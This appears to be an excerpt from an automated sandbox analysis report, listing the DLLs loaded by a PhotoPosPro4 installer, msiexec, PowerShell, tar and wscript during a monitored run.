                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\tar.exeSection loaded: archiveint.dllJump to behavior
                  Source: C:\Windows\System32\tar.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\tar.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: riched20.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: usp10.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: msls31.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: dataexchange.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: d3d11.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: dcomp.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: dxgi.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: pcacli.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: sfc_os.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: linkinfo.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: ntshrui.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: cscapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: windows.shell.servicehostbuilder.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: ieframe.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: wkscli.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: mlang.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: policymanager.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
